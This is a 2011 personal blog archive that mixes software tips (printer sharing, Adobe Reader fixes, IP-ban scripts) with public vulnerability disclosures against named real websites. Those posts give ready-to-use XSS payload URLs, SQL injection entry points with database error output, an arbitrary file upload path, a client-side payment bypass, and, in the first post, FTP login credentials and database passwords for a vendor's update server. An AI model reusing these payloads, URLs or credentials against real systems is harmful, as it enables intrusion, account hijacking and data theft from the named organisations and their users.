Posts

Showing posts from 2011

europenet.com bravo - ftp access - update suggestions - system compromise

europenet.com bravo update server address: vm203034.planetacomnetwork.com user: bravoupdate pass: eunesr OKey40 and okeyupd folders should be used to update the normal Okey client. To update flawlessly without restarting each time the update_exe.exe if a download fails. You can resume the downloads with any ftp client instead of download the files from the beginning). save the files in "Dati/Temp" and set them as read only (to avoid the deletion). After the update clean the folder except for agg.dat. The password for MagicDb.mdb is "magic" The password for catc.dat is "128159a7c9f2009" (both are Ms Access files) I cannot test the firmware and the -programmer- I don't have one and I don't own any of those products. ------------------------------------------------------------ Other informations cannot be published ... sorry.

pigrecotechnology.it SQL Injection, XSS, nt system compromise

SQL injection
www.pigrecotechnology.it/Archivio/goRicerca.asp?tipologia=tesi

SQL injection and XSS
http://www.pigrecotechnology.it/Search/contRicerca.asp
in the search form: "><script>alert(document.cookie);</script><"

XSS
http://www.pigrecotechnology.it/riservata.asp?messaggio=%3CIMG%20SRC=%27vbscript:msgbox%28%22hello%22%29%27%3E

Useless CAPTCHA
http://www.pigrecotechnology.it/riservata.asp
You can get the CAPTCHA code (numbers) from the names of the images. It can be easily avoided by a very simple bot. It's just useless.

XSS www.reply.it - sec. vulnerabilities

XSS
reply.it/it/search/?lang=IT&search=<script>alert(1);</script>

XSS
http://www.reply.it/en/tagSearch?tags=Financial+Reports%3Cscript%3Ealert%281%29;%3C/script%3E

mirror (?) - same
http://d3v578iyw1eidm.cloudfront.net/

Several problems in the JSP scripts (unmanaged null exceptions, data of the template, data, etc.).
The template (?) is visible by requesting a wrong id (?)
http://reply.it/it/practices/cloudcomputing/readd,7700-

Sample of the output (ex. http://reply.it/it/practices/cloudcomputing/readd,7700- )
---------------
<div class="yui-gc clear" id="unacolonna">
<div class="yui-u first" id="col_2_3_sx">
<div class="tab">
^service_link^ ^tag_contenuto^ ^dettaglio_contenuto^

Block Spam from Asia china .htaccess solution

After receiving tons of spam on the website I've decided to ban the whole APNIC... Previously I tried to ban only China and Korea, but without success. Since I haven't found anything to ban the whole APNIC, I've searched for the assigned classes that they manage.

P.S. I've added a few LACNIC.

Just add this in a .htaccess file and the spam from Asia should be gone:

#list retrieved from
#http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt
#Banning APNIC
deny from 1.0.0.0/8
deny from 27.0.0.0/8
deny from 36.0.0.0/8
deny from 39.0.0.0/8
deny from 42.0.0.0/8
deny from 43.0.0.0/8
deny from 49.0.0.0/8
deny from 58.0.0.0/8
deny from 59.0.0.0/8
deny from 60.0.0.0/8
deny from 61.0.0.0/8
deny from 101.0.0.0/8
deny from 103.0.0.0/8
deny from 106.0.0.0/8
deny from 110.0.0.0/8
deny from 111.0.0.0/8
deny from 112.0.0.0/8
deny from 113.0.0.0/8
deny from 114.0.0.0/8
deny from 115.0.0.0/8
deny from 116.0.0.0/8
deny from 117.0.

Use network Printer connected to a 32bit (windows xp?) with a 64bit OS

Usually this happens when you try to connect from a 64-bit OS. If you also have problems with the drivers, just install them before adding the share as a *port*. The solution and all the same content can be found here: Error 0X0000000d with network printer installation

Solution with Windows Vista:
Run a command prompt and type the following:
net use LPT2: \\servername\printer
This sets up a behind-the-scenes connection to the printer. Go through the add printer wizard, choose to add a local printer, and choose port LPT2.

Solution with Windows 7:
Go to Start and type "cmd" in the search box. Right-click on cmd and select "Run as Administrator". Type this command:
net use LPT# \\server\printer /persistent:yes
(Substitute #, server, printer as appropriate for your network.)
Add your printer locally using the LPT# port. If your laptop has no parallel cable then use LPT1.

*Hack* google blogspot blogs via XSS

Google Blogspot, after the new look, is suffering from a bunch of strange XSSs. I've found them without doing anything .... just by publishing my old XSSs. The problem is in several parts where you open the preview of the Themes (including the new one for mobile). After doing a fast test I've noticed that it also works in the comments area, so you can try to send a stored XSS and move the blog admin like a puppet through the various functionalities. I've changed the layout for *myself*, via XSS, without problems. Quite funny and ... problematic. (I'm not opening the comments for now ... and it's not a problem since there are just a few of them xD). I will not add more information but it's so SIMPLE that you just need to copy/paste one of my latest posts, as is. I'm so lucky ... sometimes ... even if in a useless way.

Simple XSS biotecnologie.frm.uniroma1.it

Simple XSS in the forms
<script>alert(document.cookie);</script>
http://biotecnologie.frm.uniroma1.it/cgi-bin/campusnet/studenti.pl/NewPass
http://biotecnologie.frm.uniroma1.it/cgi-bin/campusnet/studenti.pl/Add
------
biotecnologie.frm.uniroma1.it/cgi-bin/campusnet/aule.pl/Show?_id=32a9">{XSS here}<";sort=U2;search=%3dubicazione%3ab0ee;hits=1

http://www.ram-consulting.org - asp, XSS, Sql Injection, site access

XSS
http://www.ram-consulting.org/registrazione_analisi2.asp

SQL Injection
http://www.ram-consulting.org/admin/index.php (admin access)
http://www.ram-consulting.org/news_singola.asp
http://www.ram-consulting.org/news_singola_print.asp
http://www.ram-consulting.org/vai_news.asp

Data tampering and manipulation is possible on the cookies.

scam, xss, spam, free/fake registration - ilpopolodellaliberta.it

http://adesioneonline.ilpopolodellaliberta.it/include/comuni.php?comune=Ades.natoa&prov=Ades.natopr%0A%3Cscript%3Ealert%281%29%3C/script%3E%0A&id=Ades.idcomunens&stato=Ades.statonato&label=1&idprovv=Ades.idprovnascita
There are several XSS - I've no time to list them all.
-----------------------------------
We can change any value on the client side; there is almost no verification on the server side. I've subscribed for 0€.
-----------
During the registration I chose this one as a payment gateway, www.monetaonline.it/, and it's so strange that this p.g. has only client-side checks!!! After submitting the data I got an internal server error and I got the successful page at http://adesioneonline.ilpopolodellaliberta.it/s27servertransazioneritorno.php
I've *paid* my *free* subscription to the PDL.

LCD Display Pixel Policy

APPLE - rumors are referring about up to 15 anomalies (dead/bright/dark/any_strange pixel) for a support request
LCD display pixel anomalies for Apple products released before 2010 http://support.apple.com/kb/HT1721
About LCD display pixel anomalies for Apple products released in 2010 and later http://support.apple.com/kb/HT4044

ASUS
ASUSTeK Australia and New Zealand LCD Monitor Warranty Policy http://support.asus.com/repair.aspx?no=587&SLanguage=en
ASUS ZBD (Zero Bright Dot) http://support.asus.com/repair.aspx?no=579&SLanguage=en

ATEN - Altusen
http://www.aten.com/data/announcement/zero-dead-pixel-policy.html

BenQ - for FP series up to 24" (7 days)

Dell - All the monitors (15 days)
http://support.dell.com/support/topics/global.aspx/support/kcs/document?docid=414288

EIZO - 5/3/2/1 years.
global eizo - http://www.eizo.com/global/support/warranty/index.html
warranty it - http://www.eizo.it/supporto/garanzia.html
warranty au - http://eizo.c

www.pdlcamera.it | SQL Injection

Sample

http://www.pdlcamera.it/ufficioStampa2010.asp?News_ID=3'
Syntax error in string in query expression 'pubblicato=true AND News_ID=3' ORDER BY Date_stamp DESC'.

http://www.pdlcamera.it/ufficioStampa2010.asp?News_ID=3 group by 1
Cannot group on fields selected with '*' (tblNews).

yeppa, we have the table ... and so on...

delicious.com | XSS

the XSS is quite simple just add http://delicious.com/save?jump=yes&v=2%3Csurox&url=http://trueliarx.blogspot.com/%22%3E%3Cimg%20src=1%20onerror=alert(document.cookie)%3E%3C%22&title=pro(re)gress   (fixed)
Spammy http://forums.utest.com/rss.php?mode=Lorem%20ipsum%20dolor%20sit%20amet,%20consectetur%20adipiscing%20elit.%20Nunc%20sit%20amet%20elit%20turpis.%20Cras%20elementum,%20turpis%20quis%20rutrum%20viverra,%20dui%20sapien%20auctor%20lorem,%20sed%20suscipit%20dui%20odio%20eget%20ligula.%20Nunc%20a%20sem%20mauris,%20a%20porta%20tortor.%20Nunc%20in%20varius%20justo.%20Praesent%20venenatis%20ultrices%20condimentum.%20Morbi%20eget%20imperdiet%20ante.%20Praesent%20eros%20metus,%20pulvinar%20nec%20laoreet%20a,%20aliquam%20nec%20orci.%20Nunc%20cursus%20condimentum%20lacus,%20at%20dictum%20sapien%20tincidunt%20non.%20Nullam%20gravida%20condimentum%20leo,%20id%20porta%20nibh%20placerat%20sit%20amet.%20Phasellus%20sed%20elit%20vel%20quam%20ornare%20laoreet. (They have fixed it)

ninjasaga fb game - error denial of service free rewards

Fatal error: Uncaught exception 'Exception' with message 'Unknown column 'WALLFEED_ID' in 'where clause' sql >> delete from GET_FRIEND_REWARD where WALLFEED_ID=135494 limit 1' in /home/ninjasaga/bitemycode_api/include/db/DBConnector.php:191 Stack trace: #0 /home/ninjasaga/app.ninjasaga.com/fb_oauth_2.0/friend_reward.php(692): DBConnector->query('delete from GET...', 'social') #1 /home/ninjasaga/app.ninjasaga.com/fb_en/friend_reward.php(4): require_once('/home/ninjasaga...') #2 {main} thrown in /home/ninjasaga/bitemycode_api/include/db/DBConnector.php on line 191

Php - a fast(?) and simple approach to ban ips from your website

This is a very old tiny script that I've used to ban IP addresses from the PHP page/website. Bans are not a good solution in terms of website performance, especially if the ban list is long or complex to process.

function checkbans(){
    // Ban list: one IP address per line
    $handle = fopen("ipbans.dat.php", "r");
    if($handle === false){ return false; }
    // fgets() returns false at end of file, which ends the loop;
    // no length limit, so long (IPv6) entries are not split across reads
    while (($line = fgets($handle)) !== false) {
        // Strict string comparison against the client address
        if( trim($line) === $_SERVER['REMOTE_ADDR'] )
        {
            fclose($handle);
            //header('Location: http://www.google.com'); //redirect to google?
            exit();
        }
    }
    fclose($handle);
}

You can just call the checkbans() function from your PHP file. The storage file should be outside the web root or, if you are using it with the php extension, add <?php exit(); ?> in the first line. This is not a solution to suggest but I've found it in my old crappy code (more than five years

TinyMCE not starting

While (ab)using TinyMCE, all of a sudden it stopped working and there was no error/notice in the JS errors console. I tried several things without success and after 20 minutes I thought to start "Tamper Data" in Firefox to check what was wrong. The problem was quite simple ... a plugin was completely missing (404 page). If TinyMCE doesn't start, check the errors console, missing files, and missing div/textarea with the relative ID.

Adobe Reader X - Eula problem (again)

Acrobat Reader X is quite boring with useless problems that are annoying a lot of users. This time I got this message "Before proceeding you must first launch Adobe Acrobat and accept the End User License Agreement" while opening PDF files downloaded via browser. The previous solution (run Adobe Reader without any PDF file and accept the EULA) hasn't worked. The only method that has worked for me is to add the following registry key to accept the EULA for the browsers.

--copy the following text in a .reg file and run--

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Adobe Acrobat\10.0\AdobeViewer]
"EULAAcceptedForBrowser"=dword:00000001

Microgame casino people's tv calendario - info disclosure, XSS, flashvars xss

XSS (this one will also work after the victim clicks on any link of the page)
http://casino.peoples.it/?homeRealm=http://www.kpoker.it/&s=%22%3E%3Cvideo%20src=1%20onerror=alert%28String.fromCharCode%28112,97,115,115,101,100%29%29%20%3Ehttp://www.kpoker.it/
-----
http://www.tv.peoples.it/wp-content/themes/on-demand/
Fatal error: Call to undefined function get_header() in /var/www/vhosts/peoplespoker.tv/httpdocs/wp-content/themes/on-demand/index.php on line 1
----
free info
http://calendario.peoples.it/lepokerine/common/video_gallery.php?id=1
Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/video_gallery.php on line 2
http://calendario.peoples.it/lepokerine/common/photo_gallery.php?id=1
Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/photo_gallery.php on line 2
----
XSS http://calendario.peo

Adobe reader X (10) crash. Adobe reader suddenly closes itself.

Adobe Reader X (10) crash. When Adobe Reader 10 suddenly closes itself try these solutions:
- Run Adobe Reader 10 without opening any kind of document (ex. c:\program files\Adobe\Reader 10.0\Reader\AcroRd32.exe)
- Set AcroRd32.exe to run in compatibility mode (Windows 2000)
The EULA should appear; click on yes/accept.

The problem appears especially if you are updating (same m. version) or after installing over a different version. In some cases the problem has appeared after disabling/enabling the plugin in Firefox ... but it could be a coincidence. An easy solution for a boring problem with the damn Adobe Acrobat Reader X. I personally prefer to use Sumatra (an alternative PDF reader) but sometimes it lacks the new functionalities of Adobe Acrobat Reader and the pages cannot be viewed correctly (ex. in pre-compiled forms the previously inputted content cannot be displayed).

old coders from the Vatican .... they are still the same. XSS ...

XSS
http://press.catholica.va/news_services/bulletin/bollettino.php?lang=en%22%3E%3C/a%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22
http://player.rv.va/vaticanplayer01.asp?language=it&visual=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22
-----------------------------------------------------
It's possible to download any file from the server rv.va

http://www.asiabenevento.it | xss, arbitrary file upload, sql injection, remote administration, root compromise

-XSS-
http://www.asiabenevento.it/asiastrade/strade.php?vcercaStra=" onmouseover=alert("xss") bla="
http://www.asiabenevento.it/vedifoto.php?foto=immagini/ASIAalta.jpg&vDidascalia=&vTitolo=1%3Cscript%3Ealert%281%29;%3C/script%3E

-sql inj-
http://www.asiabenevento.it/asiastrade/strade.php

-arbitrary file upload-
http://www.asiabenevento.it/fckeditor/

Firefox Portable WebTools 0.0.0.9

A new version of Firefox Portable Webtools is available!
https://sourceforge.net/projects/firefoxwebtools/

-------------------------------------
FirefoxPortableWebTools-0.0.0.9
-------------------------------------
Firefox updated to the version 3.6.14
Reduced the size of the whole package
Added BlackStratini 2.1 Template (removed other templates)
Restored the lost Bookmarks
Some fancy graphic modifications
Greasemonkey scripts moved in a standalone package
Some garbage files removed
Installed Shockwave for Director Plugin 11.5.7.609 np32dsw.dll - (usually it can be found in C:\WINDOWS\system32\Adobe\Director)
Installed Adobe Flash Plugin 10.2.152.26 NPSWF32.dll - (usually it can be found in C:\WINDOWS\system32\Macromed\Flash)

Updated Plugins
abcTajpu (1.6.9)
Autofill Forms (0.9.8.0)
DOM Inspector (2.0.9)
Domain Details (2.6.9)
Firebug (1.6.2)
Firecookie (1.1.1)
FirePHP (0.5.0)
FireQuery (0.9)
FireRainbow (1.2)
FoxyProxy Standard (2.22.5)
Greasemonkey (0.

Flash and Shockwave for Firefox Portable

To use the latest flash and Shockwave players on firefox portable (windows) just copy the files np32dsw.dll and NPSWF32.dll to the "plugin" folder of Mozilla Firefox. It will work with both "App\Firefox\plugins" and "Data\plugins". Shockwave for Director Plugin 11.5.7.609 np32dsw.dll - (usually can be found in C:\WINDOWS\system32\Adobe\Director) Adobe Flash Plugin 10.2.152.26 NPSWF32.dll - (usually can be found in C:\WINDOWS\system32\Macromed\Flash) (added as a personal note)